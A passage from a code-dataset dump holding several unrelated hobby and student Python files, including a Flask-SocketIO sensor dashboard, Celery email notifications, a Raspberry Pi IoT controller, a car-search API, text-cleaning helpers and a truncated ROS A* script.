","sub_path":"crawler/connectors/trialsearchconnector.py","file_name":"trialsearchconnector.py","file_ext":"py","file_size_in_byte":19306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"518037364","text":"#uses port 5000 to avoid needing sudo\r\n\r\n#dependency: pip install flask-socketio\r\n\r\nfrom flask import Flask, render_template\r\nfrom flask_socketio import SocketIO,join_room, emit, send \r\nfrom threading import Thread\r\nimport json\r\nfrom kivy.logger import Logger\r\nfrom process_control import pr_cont\r\nimport gh_db_manager\r\n\r\nimport time\r\n\r\nclass gh_webserver(Thread):\r\n \r\n \r\n def __init__(self,statusgrid,gio):\r\n Thread.__init__(self)\r\n self.statusgrid=statusgrid\r\n self.daemon=True\r\n self.__running=True\r\n self.app=Flask(__name__)\r\n self.socketio=SocketIO(self.app)\r\n self._log_fn=Logger.info\r\n self._gio=gio\r\n self._db_manager=self._gio.get_db_manager()\r\n \r\n\r\n def term(self):\r\n self.__running=False\r\n \r\n def __del__(self):\r\n #add any tidy-up here\r\n pass\r\n \r\n def run(self):\r\n pr_cont.set_name(\"gh_webserver\") #allows process to be idenfified in htop\r\n 
app=self.app\r\n        socketio=self.socketio\r\n        \r\n        #----------------------\r\n        @app.route('/')\r\n        def index():\r\n            data=self.statusgrid.get_table_data()\r\n            return render_template('status.html',data=data)\r\n        \r\n        #----------------------\r\n        def send_newdata(data):\r\n            #self._log_fn(\"gh_webserver.on_newdata: Sending Data to Webserver\")\r\n            socketio.emit(\"on_newdata\",json.dumps(data),broadcast=True)\r\n        \r\n        #---------------------- \r\n        @socketio.on('get_table_data')\r\n        def send_table_data():\r\n            data=self.statusgrid.get_table_data()\r\n            self._log_fn(\"gh_webserver.get_table_data: Sending Whole Table\")\r\n            emit('on_tabledata',json.dumps(data))\r\n        \r\n        #set the callback in the statusgrid control\r\n        self.statusgrid.set_webserver_newdata_fn(send_newdata)\r\n        \r\n        #----------------------\r\n        @app.route('/graph1')\r\n        def graph1():\r\n            return render_template('graph1.html')\r\n        \r\n        #---------------------- \r\n        @socketio.on('get_graph_raw_data')\r\n        def get_graph_raw_data(tname,pname,xmin,xmax):\r\n            db=self._db_manager.get_database(tname,pname)\r\n            data=db.get_raw_line(xmin,xmax)\r\n            print('gh_webserver.get_graph_raw_data(',tname,',',pname,',',xmin,',',xmax,')')\r\n            #self._log_fn('gh_webserver.get_graph_raw_data(',tname,',',pname,',',xmin,',',xmax,')')\r\n            emit('on_graphrawdata',json.dumps(data))\r\n        \r\n        #----------------------\r\n        if __name__ == '__main__':\r\n            self.socketio.run(self.app,\r\n                host='0.0.0.0', port=5000, debug=True, use_debugger=False,\r\n                use_reloader=False)\r\n        else: #kivy mode\r\n            from logging import Logger\r\n            Logger.manager.loggerDict['werkzeug'] = Logger.manager.loggerDict['kivy']\r\n            self.socketio.run(self.app,\r\n                host='0.0.0.0', port=5000, debug=True, use_debugger=True,\r\n                use_reloader=False)\r\n        #----------------------\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    server=gh_webserver()\r\n    server.start()\r\n    while True:\r\n        time.sleep(10)","sub_path":"gh_webserver.py","file_name":"gh_webserver.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"470518841","text":"import sys, os, math\nsys.path.append('..')\nfrom DBConnection.MongoDBConnection import MongoDB\nimport numpy as np\nfrom scipy import spatial\nimport matplotlib.pyplot as plt\n\ndef getTopicsBagOfWords():\n    topicsBagOfWords = []\n    for temporalSlice in db.query(\"TemporalSlice\").sort('start', 1):\n        for i in range(0, len(temporalSlice['topics'])):\n            topicsBagOfWords += [word['word'] for word in temporalSlice['topics'][i]]\n\n    return {item: idx for idx, item in enumerate(set(topicsBagOfWords))}\n\nwith MongoDB(\"TesiMagistrale\") as db:\n    topicsBagOfWords = getTopicsBagOfWords()\n\n    # Loop over every temporal slice\n    for temporalSlice in db.query(\"TemporalSlice\").sort('start', 1):\n        yearWordSenseDict = {}\n        # Loop over every topic and every word inside it\n        for i in range(0, len(temporalSlice['topics'])):\n            for selectWord in temporalSlice['topics'][i]:\n                # Create a sparse vector for each selected word that represents its sense\n                wordSenseSparseVector = np.zeros(len(topicsBagOfWords), dtype=np.uint8)\n                for word in temporalSlice['topics'][i]:\n                    if word['word'] != selectWord['word']:\n                        wordSenseSparseVector[topicsBagOfWords[word['word']]] = 1\n\n                # If the word is not yet in the sense dictionary, insert it as a key\n                if selectWord['word'] not in yearWordSenseDict:\n                    yearWordSenseDict[selectWord['word']] = []\n\n                # Insert the sense for the word\n                
yearWordSenseDict[selectWord['word']].append((i+1, wordSenseSparseVector))\n\n        print(f\"\\n\\n--------- {temporalSlice['start']}-{temporalSlice['end']} ---------\\n\")\n        # Loop over all words in the dictionary\n        for word, senses in yearWordSenseDict.items():\n            if len(senses) > 1:\n                print(f\"{word}:\")\n\n                i = 0\n                # Loop over all sense pairs of the word and compute their cosine similarity\n                for topic1, sense1 in senses:\n                    i += 1\n                    for topic2, sense2 in senses[i:]:\n                        print(f\"{topic1}-{topic2} -> {1 - spatial.distance.cosine(sense1, sense2)}\")","sub_path":"venv/Src/4-AnalizeTopics/WordSenseInduction.py","file_name":"WordSenseInduction.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"336595988","text":"# Main\r\nfrom database import BancoDeDados\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    banco = BancoDeDados()\r\n    banco.conecta()\r\n    banco.criarTabelas()\r\n\r\n    banco.inserirCliente('Bruno', '11111111111', 'brunoolc@gmail.com')\r\n    banco.inserirCliente('Andrelize', '22222222222', 'andrelize@gmail.com')\r\n\r\n    banco.buscarClientes('22222222222')\r\n\r\n    banco.removerCliente('11111111111')\r\n    banco.buscarClientes('11111111111')\r\n    print(banco.buscar_email('andrelize@gmail.com'))\r\n    banco.desconecta()","sub_path":"ProjetoSQL_BrunoCalheiros/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"383879914","text":"from random import random\n\nDECK = list(range(1, 101))\nN = 100\nITER = 100\n\n\ndef udiscrete(m, k):\n    \"\"\"\n    Uniform discrete variable in interval [m, k]\n    \"\"\"\n    u = random()\n    return int(u*(k-m+1))+m\n\n\ndef permutation(x):\n    \"\"\"\n    Random permutation\n    \"\"\"\n    N = len(x)\n\n    for i in range(N-1, 0, -1):\n        # Uniform in [0,i]\n        index = udiscrete(0, i)\n        tmp = x[index]\n        x[index] = x[i]\n        x[i] = tmp\n    return x\n\n\ndef experiment():\n    \"\"\"\n    Shuffles a deck of size n = 100, and draws cards one by one.\n    Success: If the i-th card is the card N° = i\n    \"\"\"\n    shuffle_deck = permutation(DECK)\n    success = [1 for i in range(len(shuffle_deck)) if shuffle_deck[i] == i + 1]\n\n    return sum(success)\n\n\nif __name__ == '__main__':\n\n    # Estimate the mean of the success experiments\n    success = [experiment() for x in range(ITER)]\n    mean = sum(success) / ITER\n    print(\"Mean: {}\".format(mean))\n\n    # Estimate the second moment of the success experiments\n    success = [experiment() ** 2 for x in range(ITER)]\n    mean2 = sum(success) / ITER\n    print(\"Mean2: {}\".format(mean2))\n\n    variance = mean2 - (mean ** 2)\n    print(\"variance: {}\".format(variance))\n","sub_path":"tp4/ej1.py","file_name":"ej1.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"97302222","text":"from celery import shared_task\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth.models import User\nimport datetime\n\nfrom .models import Post, Category\n\n\n@shared_task\ndef post_notify(post_id):\n    post = Post.objects.get(id=post_id)\n    subscribers_list = User.objects.filter(id__in=post.category.all().values('subscriber'))\n\n    for user in subscribers_list:\n\n        html_content = render_to_string(\n            'news/send_notify_post_create.html',\n            {\n                'username': user.username,\n                'post': post,\n                'post_text': post.text[:50],\n            }\n        )\n\n        
email_text = EmailMultiAlternatives(\n subject=post.header,\n body='text',\n from_email='nedgalkin@gmail.com',\n to=[user.email],\n )\n email_text.attach_alternative(html_content, \"text/html\")\n email_text.send()\n\n\n@shared_task\ndef weekly_post_notify():\n today_date = datetime.datetime.now()\n week_ago_date = today_date - datetime.timedelta(weeks=1)\n category_list = Category.objects.all()\n\n for category in category_list:\n post_list = Post.objects.filter(category=category, time__range=(week_ago_date, today_date))\n if post_list:\n subscribers_list = category.subscriber.all()\n email_list = list(email['email'] for email in subscribers_list.values('email'))\n\n html_content = render_to_string(\n 'news/send_notify_weekly.html',\n {\n 'post_list': post_list,\n }\n )\n\n email_text = EmailMultiAlternatives(\n subject='Еженедельная рассылка новостей',\n body='text',\n from_email='nedgalkin@gmail.com',\n to=email_list,\n )\n email_text.attach_alternative(html_content, \"text/html\")\n email_text.send()\n","sub_path":"NewsPaper/news/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87619251","text":"from sys import argv\nfrom sys import exit\nimport json\nimport csv\n\n# Fields' indicies 0..n\nclasses = 3\ndescription = 4\n# Fields' separators\nsep_classes = ','\nsep_descitems = '\\n'\n\n# Split functions for complex data strings\ndef parse_classes(item):\n return item.replace(' ', '').split(sep_classes)\n\ndef parse_description(item):\n items = item.split(sep_descitems)\n features = list()\n for feature in items:\n if len(feature) > 0:\n features.extend(feature.split(\". \"))\n map(lambda it: it.strip(), features)\n return features\n\n# Command-line arguments\ndef help():\n print(\"Usage: python\", argv[0], \" [out JSON]\")\n\n# Process CSV file\nif not (len(argv) in range(2, 4)):\n help()\n exit(1)\n\ntry:\n jout = list()\n with open(argv[1], newline='') as ifile:\n reader = csv.reader(ifile, delimiter=';')\n header = next(reader)\n data = list(reader)\n for item in data:\n # Split fields into lists by separators\n item[classes] = parse_classes(item[classes])\n item[description] = parse_description(item[description])\n # Zip lists into dicts (JSON objects)\n jout.append(dict(zip(header, item)))\n if len(argv) == 2:\n print(json.dumps(jout, indent=4, ensure_ascii=False))\n elif len(argv) == 3:\n try:\n with open(argv[2], \"w+\") as ofile:\n json.dump(jout, ofile, indent=4, ensure_ascii=False, skipkeys=True)\n except:\n print(\"Error writing output file! Make sure the path valid.\")\nexcept:\n print(\"Error processing input file! 
Make sure CSV is valid.\\n\")\n    help()\n","sub_path":"csv_converter/csv_converter.py","file_name":"csv_converter.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"275871828","text":"import RPi.GPIO as GPIO\nimport time\nimport urllib3\nimport spidev\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(29,GPIO.OUT)\nGPIO.setup(31,GPIO.OUT)\nGPIO.setup(33,GPIO.OUT)\n\nspi=spidev.SpiDev()\nspi.open(0,0) \n\ndef read_data(channel):\n    spi.max_speed_hz=1350000\n    if channel>7 or channel <0:\n        return\n    r=spi.xfer2([1,8+channel<<4,0])\n    data=((r[1]&3)<<8)+r[2]\n    return data\n\ndef temp(channel):\n    temp=read_data(channel)\n    temp=(temp/204.6)*100\n    return temp\n\ndef read_data_base(Component_ID):\n    url = \"http://azetech.in/office/scripts/IoT.php?api=ReadValue&ID=\"\n    url += Component_ID\n    http = urllib3.connection_from_url(url)\n    r = http.urlopen('GET',url)\n    data = r.data.decode(\"utf-8-sig\").encode(\"utf-8\")\n    print(data)\n    return data\n\n\ndef Write_Database(Component_ID,data):\n    url = \"http://azetech.in/office/scripts/IoT.php?api=UpdateValue&ID=\" + Component_ID + \"&value=\"\n    http_pool = urllib3.connection_from_url(url)\n    r = http_pool.urlopen('GET',url+(data))\n    # print(data)\n\ntry:\n    while 1:\n        value=temp(0)\n        value=str(value)\n        print(value[:5]+'c')\n        Write_Database(\"IOTCMP00129\",value[:5]+'c')\n        # time.sleep(1)\n        GPIO.output(29,ord(read_data_base(\"IOTCMP00126\"))-48)\n        GPIO.output(31,ord(read_data_base(\"IOTCMP00127\"))-48)\n        GPIO.output(33,ord(read_data_base(\"IOTCMP00128\"))-48)\n\nexcept Exception:\n    print(\"Program Terminated!\")\n","sub_path":"RPi_Pro/iot_home_automation.py","file_name":"iot_home_automation.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"94401207","text":"# Random number guessing game\nimport random\n\na = random.randint(0, 100)\nn = 0\nwhile n < 6:\n    b = eval(input('please input an integer from 1 to 100: '))\n    n += 1\n    if isinstance(b, int) and b > 0:\n        if a < b:\n            print('大了')\n        elif a > b:\n            print('小了')\n        else:\n            print('猜对了')\n            break\n    else:\n        print('输入错误,请重新输入')\nif a != b:\n    print('正确的数是%s' % a)\n\n# 9x9 multiplication table\nfor i in range(1,10):\n    for j in range(1,i+1):\n        print('%d * %d = %d\\t' % (i,j,i*j),end=' ')\n    print(' ')\n","sub_path":"lesson01/heweiping/zuoye.py","file_name":"zuoye.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"467229998","text":"from . 
import *\nfrom app.irsystem.models.helpers import *\nfrom app.irsystem.models.helpers import NumpyEncoder as NumpyEncoder\nfrom flask import send_from_directory\nfrom flask import request\nfrom json import dumps, loads\nfrom app.irsystem.models.search import Searcher\nfrom app.irsystem.models.imagesearch import ImageSearcher\nfrom statistics import mean\n\nproject_name = \"Vroom Vroom\"\nnet_id = \"Janice Chan: jc2729, Haram Kim: hk592, Stephanie Shum: ss2972, Nataly Rodriguez: nyr2, Jasmine Kitahara: jkk95\"\n\n# create searcher object\nsearcher = Searcher()\nimage_searcher = ImageSearcher()\n\n@irsystem.route('/', methods=['GET'])\ndef search():\n \"\"\"Serve the frontend HTML file\"\"\"\n return render_template('index.html')\n\n@irsystem.route('/manifest.json', methods=['GET'])\ndef send_manifest():\n return send_from_directory('frontend/build', 'manifest.json')\n\n@irsystem.route('/favicon.ico', methods=['GET'])\ndef send_fav():\n return send_from_directory('frontend/build', 'favicon.ico')\n\n@irsystem.route('/static//', methods=['GET'])\ndef send_static(css_js,file):\n print('sending sttic')\n return send_from_directory('frontend/build/static', css_js+'/'+file)\n\n@irsystem.route('/keywords', methods=['GET'])\ndef get_keywords():\n \"\"\"Route to provide the list of good types to the frontend\"\"\"\n return dumps([{\"text\": kw} for kw in searcher.index_to_vocab.values()])\n\n@irsystem.route('/search', methods=['GET'])\ndef do_search():\n \"\"\"Route to handle search requests from frontend.\n Querystring must contain the arguments:\n - size1: First of two car size filter strings; unordered\n - size2: Second of two car size filter strings; unordered\n - minPrice: Minimum price to filter with\n - maxPrice: Maximum price to filter with\n - keywords: A list of strings giving the keywords to be passed to Searcher\n \"\"\"\n # unpack variables from querystring\n size1 = request.args.get(\"size1\")\n size2 = request.args.get(\"size2\")\n min_price = int(request.args.get(\"minPrice\"))\n max_price = int(request.args.get(\"maxPrice\"))\n fuel1 = request.args.get(\"fuel1\")\n fuel2 = request.args.get(\"fuel2\")\n keywords_and_priorities = loads(request.args.get(\"keywords\"))\n\n # TODO: remove this line\n print(keywords_and_priorities)\n\n # convert mapping words to min and max size integers\n mapping = {\"Compact\":0, \"Midsize\":1, \"Large\":2}\n size1 = mapping[size1]\n size2 = mapping[size2]\n min_size = min(size1, size2)\n max_size = max(size1, size2)\n\n fuel_mapping = {\"Gas-Guzzler\":0, \"Standard\":1, \"Fuel-Efficient\":2, \"Hybrid\":3, \"Electric\":4}\n fuel1 = fuel_mapping[fuel1]\n fuel2 = fuel_mapping[fuel2]\n min_fuel = min(fuel1, fuel2)\n max_fuel = max(fuel1, fuel2)\n\n\n # call search method\n search_results = searcher.search(min_size=min_size, max_size=max_size, min_price=min_price,\n max_price=max_price, min_fuel=min_fuel, max_fuel=max_fuel, query=keywords_and_priorities)\n\n\t# generate object to send to frontend\n to_send = []\n for idx, ymm in enumerate(search_results[\"results\"]):\n car = searcher.all_data.get(ymm)\n print(ymm)\n ratings = [float(review[\"Rating\"]) for review in car[\"reviews\"] if review[\"Rating\"].replace('.','',1).isnumeric()]\n \n # extract only the fields we care about to save\n car_to_send = {\"MSRP\": car[\"MSRP\"], \"avg_rating\": mean(ratings), \"ranking\": idx, \"ymm\": ymm}\n\n # get car make-model string to find image\n make_model = car[\"Make\"] + \" \" + car[\"Model\"]\n make_model = make_model.replace(\"/\", \":\")\n try:\n 
car_to_send[\"img\"] = image_searcher.image_search(make_model).decode('utf-8')\n except:\n pass\n\n # add to list to send\n to_send.append(car_to_send)\n\n # send back json of results from Searcher\n return dumps({\"results\": to_send, \"query\": search_results[\"query\"]})\n\n@irsystem.route('/cardetails', methods=['GET'])\ndef get_details():\n\t\"\"\"Route to provide specific car details to the frontend\"\"\"\n\t# unpack year-make-model from querystring\n\tymm = request.args.get(\"carYMM\")\n\n\t# add average star rating to car\n\tcar = searcher.all_data.get(ymm)\n\tratings = [float(review[\"Rating\"]) for review in car[\"reviews\"] if review[\"Rating\"].replace('.','',1).isnumeric()]\n\tcar[\"avg_rating\"] = mean(ratings)\n\n\t# get car make-model string\n\tmake_model = car[\"Make\"] + \" \" + car[\"Model\"]\n\tmake_model = make_model.replace(\"/\", \":\")\n\n\t# get image; fail silently\n\ttry:\n\t\tcar[\"img\"] = image_searcher.image_search(make_model).decode('utf-8')\n\texcept:\n\t\tpass\n\n\t# return a json of the car data\n\treturn dumps(car, allow_nan=False)\n","sub_path":"app/irsystem/controllers/search_controller.py","file_name":"search_controller.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171075602","text":"\"\"\"Module for turning dataset from bats in bat boxes into complete datasets.\nBe sure to use python3 when running this code. By Hugo Loning 2016\n\"\"\"\n\nfrom helper.load_info import load_transects\nfrom helper.write_data import write_array\n\n\ndef load_bats_in_boxes_file(filename):\n \"\"\"Return bats dataset array of specified file including transect information\"\"\"\n tr_array = load_transects()\n bats_array = []\n with open(filename) as bats_file:\n for line in bats_file:\n if line.startswith(\"transect;box\"): # if it's the header\n continue\n # strip and split the line on ; and convert all possible items into int\n line = [int(elem) if elem.isdigit() else elem for elem in line.strip().split(';')]\n # convert bat measurements to float\n try:\n line[9], line[10] = float(line[9]), float(line[10])\n except ValueError: # this will run, unless empty or NA or a case of a value of '>20'\n pass\n # fix box numbering of 75 and 78\n if line[1] == 75 or line[1] == 78: # box 75 is actually 45, just a new door, same for 78 and 48\n line[1] -= 30\n # remove marked individuals\n if line[-1].startswith('marked'): # if individual already caught before on that day\n line[6:] = [0, '', '', '', '', ''] # clear the entry\n # add some additional info\n transect = line[0]\n site, colour = tr_array[transect]\n line.insert(0, site)\n line.insert(3, colour)\n bats_array.append(line)\n return bats_array # [site, transect, box, colour, day, month, year, poo, animals, species, sex, ual, mass, remarks]\n\n\ndef create_data_dict(bats_array):\n \"\"\"Return a dictionary of specified bats array which counts and scores poo (yes/no) for Pp and bats\"\"\"\n data_dict = {}\n for row in bats_array:\n site, transect, box, colour = row[:4]\n poo, nr, species = row[7:10]\n remark = row[-1]\n if transect not in data_dict: # add it\n data_dict[transect] = [site, transect, colour, 0, 0, 0, 0] # [site, tr, clr, pp_poo, bat_poo, pp, bats]\n data_dict[transect][4] = data_dict[transect][4] or poo # update bat_poo\n if not remark.startswith('poo'): # all remarks starting with poo indicate that the poo is not of Pp\n data_dict[transect][3] = data_dict[transect][3] or poo # update pp_poo\n 
data_dict[transect][6] += nr # update number of bats\n if species == 'pp':\n data_dict[transect][5] += nr # update number of Pippistrellus pippistrellus\n return data_dict\n\n\ndef create_data_array(bats_array):\n \"\"\"Return a dataset array with scored poo and counts for Pp and bats in general,\n also return the header names of this dataset array\n \"\"\"\n data_dict = create_data_dict(bats_array)\n data_array = []\n for tr in data_dict:\n data_array.append(data_dict[tr])\n col_names = ['site', 'transect', 'colour', 'pp_poo', 'bat_poo', 'pp', 'bats']\n return data_array, col_names\n\n\ndef create_body_measurement_array(bats_array):\n \"\"\"Return a dataset array with body measurements and body condition index for all bats,\n also return the header names of this dataset array\n \"\"\"\n meas_array = []\n for row in bats_array:\n sex, ual, mass = row[10:13]\n if sex != '': # if it's a measured bat\n bci_row = row[:-1] # copy everything but the remark\n try:\n bci_row.append(mass / ual)\n except TypeError:\n bci_row.append('NA')\n del bci_row[7:9] # remove information of poo and number of animals (always 1)\n meas_array.append(bci_row)\n col_names = ['site', 'transect', 'box', 'colour', 'day', 'month', 'year', 'species', 'sex', 'ual', 'mass', 'bci']\n return meas_array, col_names\n\n\ndef create_sex_counted_array(bats_array):\n \"\"\"Return a dataset array with counted bats of which sex is known, also return header names\"\"\"\n sex_counted_dict = {}\n for row in bats_array:\n site, transect, box, colour, *rest, species, sex = row[:11]\n if transect not in sex_counted_dict:\n sex_counted_dict[transect] = [transect, site, colour, 0, 0]\n if sex == 'male' and species == 'pp': # count males\n sex_counted_dict[transect][3] += 1\n elif sex == 'female' and species == 'pp': # count females\n sex_counted_dict[transect][4] += 1\n sex_counted_array = []\n for value in sex_counted_dict.values():\n transect, site, colour, male, female = value\n sex_counted_array.append([transect, site, colour, 'male', male])\n sex_counted_array.append([transect, site, colour, 'female', female])\n col_names = ['transect', 'site', 'colour', 'sex', 'pp']\n return sex_counted_array, col_names\n\n\n# Script begins here\nif __name__ == \"__main__\":\n # Specify file to load and files to write\n to_load = 'bats_in_bat_boxes.csv'\n write_bats = 'dataset_bats_in_bat_boxes.csv'\n write_body_measurements = 'dataset_bat_body_measurements.csv'\n write_sex_counted = 'dataset_bats_sex_counted.csv'\n\n # The script\n print(\"BATS IN BAT BOXES DATA CREATION SCRIPT FOR LON BY HUGO LONING 2016\\n\")\n loaded = load_bats_in_boxes_file(to_load)\n print(\"Loaded {}...\\n\".format(to_load))\n array, header_names = create_data_array(loaded)\n write_array(array, header_names, write_bats)\n print(\"Written bats dataset to {}\\n\".format(write_bats))\n measurement_array, headers = create_body_measurement_array(loaded)\n write_array(measurement_array, headers, write_body_measurements)\n print(\"Written body measurements dataset to {}\\n\".format(write_body_measurements))\n sex_counted, columns = create_sex_counted_array(loaded)\n write_array(sex_counted, columns, write_sex_counted)\n print(\"Written sex counted bats dataset to \" + write_sex_counted)\n","sub_path":"bats_in_bat_boxes_dataset_creation.py","file_name":"bats_in_bat_boxes_dataset_creation.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"621704189","text":"import pandas as pd\r\nimport 
os\r\nimport re\r\n\r\nclass GoodProfile():\r\n    def __new__(cls, *args, **kwargs):\r\n        if not hasattr(cls, '_instance'):\r\n            cls._instance = super().__new__(cls)\r\n        return cls._instance\r\n\r\n\r\n    def __init__(self, path = None):\r\n        if path != None:\r\n            l = os.listdir(path)\r\n            self.good_profile_file = None\r\n            self.df = None\r\n\r\n            for i in l:\r\n                m = re.match(r'^商品资料.*\\.xlsx$', i)\r\n                if m != None:\r\n                    self.good_profile_file = i\r\n                    print(\"开始解析商品资料文件:%s ......\" % self.good_profile_file, end='')\r\n                    self.df = pd.read_excel(os.path.join(path, self.good_profile_file))\r\n                    print(\"完成\")\r\n                    return\r\n            print(\"商品资料文件未找到\")\r\n\r\n\r\n    def has_profile(self):\r\n        '''Check whether a goods profile file exists'''\r\n        return self.df is not None\r\n\r\n    def get_good_info(self,code):\r\n        '''Only call this when has_profile() returns True'''\r\n        existing = False\r\n        create_time = None\r\n\r\n        df2 = self.df.loc[self.df['款式编码'] == code]\r\n        if len(df2) > 0:\r\n            existing = True\r\n            create_time = df2.iloc[0]['创建时间']\r\n\r\n        return (existing, create_time)\r\n","sub_path":"goods_profile.py","file_name":"goods_profile.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"534189138","text":"import re, nltk\n\n# file for holding all the functions for cleaning up the data\n\ndef good_ngram(n):\n\t\"\"\"\n\ttakes an ngram and checks to make sure all words are good\n\t\"\"\"\n\tfor w in n:\n\t\tif not good_word(w):\n\t\t\treturn False\n\treturn True\n\ndef good_word(w):\n\t\"\"\"\n\ttakes a word and checks if we want to keep track of it\n\tlike, some junk in COCA is just noise\n\t\"\"\"\n\n\t# we want to exclude punctuation\n\t# the way this works is that it will FORCE us to \n\t# keep moving the 'sliding window' until we're past the\n\t# punctuation -> so that \"big . 
Blue\" is not saved as a \n\t# trigram\n\tpunc = \"\\&!\\?:@\\.,\\\"\\\\\\/\\$\\'\\%\\)\\(\\*\\#+\"\n\tpunc = re.compile(\"^[\" + punc + \"]\")\n\n\tif len(w) == 0:\n\t\treturn False\n\n\tif re.search(punc,w):\n\t\treturn False\n\n\t# COCA has names of speakers in CAPS\n\tif w == w.upper() and len(w) > 1:\n\t\treturn False\n\n\treturn True\n\ndef clean_line(line):\n\t\"\"\"\n\ttakes a line of text and returns a \"cleaned\" form of the line\n\t\n\t\"\"\"\n\n\t# the way COCA does it is is to split \"\"contractions\"\" into \n\t# separate words, we'll just plop them on the previous word\n\tcontractions = (\"n't\", \"'re\", \"'s\", \"'me\",\n\t\t\"'m\", \"'ll\", \"'ve\", \"'d\")\n\n\tl = line.rstrip().rsplit(\" \")\n\tline = \"\"\n\tfor w in l:\n\t\tcw = clean_word(w)\n\t\t# because COCA makes n't separate words\n\t\tif cw in contractions:\n\t\t\tline = line[:-1] + cw + \" \"\n\t\telse:\n\t\t\tline += cw + \" \"\n\n\treturn(line[:-1])\n\ndef clean_word(w):\n\t\"\"\"\n\ttakes a word and \"cleans\" it, ie folds case and gets rid of weird stuff\n\t\"\"\"\n\tw = w.lower()\n\tw = re.sub(\"(^[\\-\\.]|[\\-\\.;,]$)\",\"\",w)\n\treturn(w)\n\ndef preprocess_COCA():\n\t\"\"\"\n\tpreprossessing - we take in COCA, run EVERYTHING through\n\t# the clean_line fucntion and save the result - so we don't\n\t# need to do it everytime we run\n\t\n\t\"\"\"\n\tprint(\"***PREPROCESSING COCA***\")\n\tprint(\"We're going to open up the COCA file and clean it\", \\\n\t\t\"up so we don't need to do that for every run.\")\n\n\trF = open(\"COCA.cat.txt\", \"r\")\n\twF = open(\"COCA.clean.txt\", \"w\")\n\n\ti = 0\n\tfor line in rF:\n\t\ti+=1\n\t\tprint(\"Doing line\", i, end=\"\\r\")\n\t\twF.write(clean_line(line) + \"\\n\")\n\n\trF.close()\n\twF.close()\n","sub_path":"code/housekeeping.py","file_name":"housekeeping.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"630886741","text":"#!/usr/bin/env python\nimport rospy, numpy, math\nfrom nav_msgs.msg import GridCells, OccupancyGrid\nfrom geometry_msgs.msg import Point, Twist, Pose, PoseStamped\nfrom Queue import PriorityQueue\nfrom math import sqrt\nfrom astar_goodish import aStar\n\ndef publishColor(color):\n\tglobal pub\n\tpub.publish(color)\n\ndef setGridCells(msg):\n\tglobal cell_width\n\tglobal cell_height\n\tglobal instance\n\tglobal res\n\n\tcell_height = msg.info.height\n\tcell_width = msg.info.width\n\tinstance = msg.data\n\tres = msg.info.resolution\n\ndef drawWalls(grid_pub):\n\tglobal height\n\tglobal width\n\tglobal obstacles_pub\n\ti = 0\n\n\tobstacles=GridCells()\n\tobstacles.header.frame_id = 'map'\n\tobstacles.cell_width = 0.3\n\tobstacles.cell_height = 0.3\n\tfor y in range (0, height):\n\t\tfor x in range (0, width):\n\t\t\tif (grid[i] == 100):\n\t\t\t\tobstacles.cells.append(Point(x*0.3+0.7, y*0.3+0.2, 0))\n\n\t\t\ti = i + 1\n\tobstacles_pub.publish(obstacles)\n\ndef mapCallBack(data):\n\tglobal width\n\tglobal height\n\tglobal grid\n\n\twidth = data.info.width\n\theight = data.info.height\n\tgrid = data.data\n\ndef startPoseCallback(pose):\n\tglobal start\n\n\tx = int(pose.pose.position.x)\n\ty = int(pose.pose.position.y)\n\n\tstart = (x,y)\n\ndef endPoseCallback(pose):\n\tglobal goal\n\n\tx = int(pose.pose.position.x)\n\ty = int(pose.pose.position.y)\n\n\tgoal = (x,y)\n\n# main\nif \t__name__ == \"__main__\":\n\tglobal cell_width\n\tglobal cell_height\n\tglobal instance\n\tglobal res\n\tglobal obstacles\n\tglobal unexplored\n\tglobal width\n\tglobal 
